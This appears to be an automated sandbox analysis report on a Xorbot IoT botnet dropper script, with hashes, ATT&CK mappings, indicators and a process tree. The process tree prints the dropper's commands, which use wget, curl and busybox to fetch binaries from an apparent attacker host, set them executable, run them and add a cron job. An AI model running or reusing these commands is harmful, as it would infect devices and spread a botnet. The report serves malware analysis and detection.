xorbot | ca83d4d78bc4f33cc4533280f3b37ec8016c54b8763b62ec398bc677249c4724

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
10/12/2024, 20:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

c84ccfc6e497a40632f30dfeb029ec63
SHA1

eeb176681b831a1002431dc6975172be4fc0eef9
SHA256

ca83d4d78bc4f33cc4533280f3b37ec8016c54b8763b62ec398bc677249c4724
SHA512

60619865c199cfa22e2042755c8893a8991096e43b37012f5b73f0b24018edf5f1ec3052de5f12ae2e46b43660196950c9996b8ce8887b751b84c30038089ffc
SSDEEP

192:+/0wBmuoXWeepObrs59oPxtYUL+O4DVd6D3+P0wBmum5eUbrs59E1YUL+OeVd6Dd:+/0wBmuomlObrs59oPxqDVd6D3+P0wBQ

Score

10^/10

xorbot botnet defense_evasion discovery execution persistence privilege_escalatio trojan

Malware Config

Signatures

Detects Xorbot 3 IoCs

botnet trojan

resource	yara_rule
behavioral4/files/fstream-1.dat	family_xorbot
behavioral4/files/fstream-8.dat	family_xorbot
behavioral4/files/fstream-9.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Contacts a large (1823) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 4 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
753	chmod
853	chmod
730	chmod
738	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw	731	jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
/tmp/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV	739	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
/tmp/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo	755	3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
/tmp/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb	855	Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb

Renames itself 1 IoCs

pid	Process
740	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.U1re8L	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/750/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/901/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/984/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1011/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/150/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/887/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1029/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/769/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/799/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/862/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/911/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/949/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/993/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1022/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1037/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/547/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/780/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/818/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/914/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/991/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/989/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1016/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/842/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/867/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/877/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/945/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/975/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/912/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1000/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/19/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/754/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/770/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/809/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/905/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/833/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/6/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/388/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/798/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/801/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/805/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/876/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/762/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/781/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/787/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/806/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/860/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/944/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1013/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1021/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/5/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/71/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/791/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/810/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/928/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1024/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/72/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/694/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/869/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/906/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/1031/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/13/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/808/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/908/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
File opened for reading	/proc/927/cmdline	AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV

System Network Configuration Discovery 1 TTPs 13 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
749	wget
841	curl
863	wget
734	wget
735	curl
737	busybox
750	curl
751	busybox
705	wget
722	curl
729	busybox
758	wget
846	busybox

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV	wget
File opened for modification	/tmp/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV	curl
File opened for modification	/tmp/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV	busybox
File opened for modification	/tmp/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo	busybox
File opened for modification	/tmp/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb	busybox
File opened for modification	/tmp/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw	wget
File opened for modification	/tmp/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw	curl
File opened for modification	/tmp/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:697
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:703
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:705
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:722
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:729
- /bin/chmod
  chmod 777 jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  2⤵
  - File and Directory Permissions Modification
  PID:730
- /tmp/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  ./jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  2⤵
  - Executes dropped EXE
  PID:731
- /bin/rm
  rm jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw
  2⤵
  PID:733
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:734
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:735
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:737
- /bin/chmod
  chmod 777 AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  ./AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Reads runtime system information
  PID:739
- - /bin/sh
    sh -c "crontab -l"
    3⤵
    PID:741
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:742
- - /bin/sh
    sh -c "crontab -"
    3⤵
    PID:743
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:744
- /bin/rm
  rm AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV
  2⤵
  PID:746
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  2⤵
  - System Network Configuration Discovery
  PID:749
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  2⤵
  - System Network Configuration Discovery
  PID:750
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:751
- /bin/chmod
  chmod 777 3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  2⤵
  - File and Directory Permissions Modification
  PID:753
- /tmp/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  ./3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  2⤵
  - Executes dropped EXE
  PID:755
- /bin/rm
  rm 3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo
  2⤵
  PID:757
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  2⤵
  - System Network Configuration Discovery
  PID:758
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  2⤵
  - System Network Configuration Discovery
  PID:841
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:846
- /bin/chmod
  chmod 777 Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  2⤵
  - File and Directory Permissions Modification
  PID:853
- /tmp/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  ./Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  2⤵
  - Executes dropped EXE
  PID:855
- /bin/rm
  rm Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb
  2⤵
  PID:858
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/7pDO0jGMJ6wMJgCbSqsHkSZhJl5ldrN2n9
  2⤵
  - System Network Configuration Discovery
  PID:863

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3Te3Qe5AhqA2j3rEEYa4itFVHBOdsM8PIo

Filesize
107KB

MD5
eb9c3a0de91fcf16ba17cb24608df68c

SHA1
09d95a7d70d5e115d103be51edff7c498d272fac

SHA256
dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47

SHA512
9e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27

Download Submit
/tmp/Ag1wYToQjbJK2R2jL76aQhsolhJtFfsRYb

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/AtFoorInAN5cLjbYRwOprSGPgqIobTQ0VV

Filesize
151KB

MD5
6c583043d91c55aa470c08c87058e917

SHA1
abf65a5b9bba69980278ad09356e53de8bb89439

SHA256
2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

SHA512
82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

Download Submit
/tmp/jYwKywvzTWbLRCsFPqtJt1PDllBAjfiRLw

Filesize
99KB

MD5
9438d9bc392bcf300a5583b6df5bc8f6

SHA1
375a6ae34b516f6f3eeea8030c4084f585017efa

SHA256
68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

SHA512
1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

Download Submit
/var/spool/cron/crontabs/tmp.U1re8L

Filesize
210B

MD5
1428c2c2cc33f8ebea0d84b7cf5166a2

SHA1
d463444e01623f8c52cc917c4083cd45600c869a

SHA256
42fe861f840e86c29f09c874fb666683364f6501d7bcaec7c344e34eb8e99916

SHA512
0631c64a12a4ce3dda414b7e598ef7ed72d5513f5f1e4375f6b3c7027c859443167fdc5d41295486994c1556cffc3e74e165fbb87fa9ac0ed111929911cc82da

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads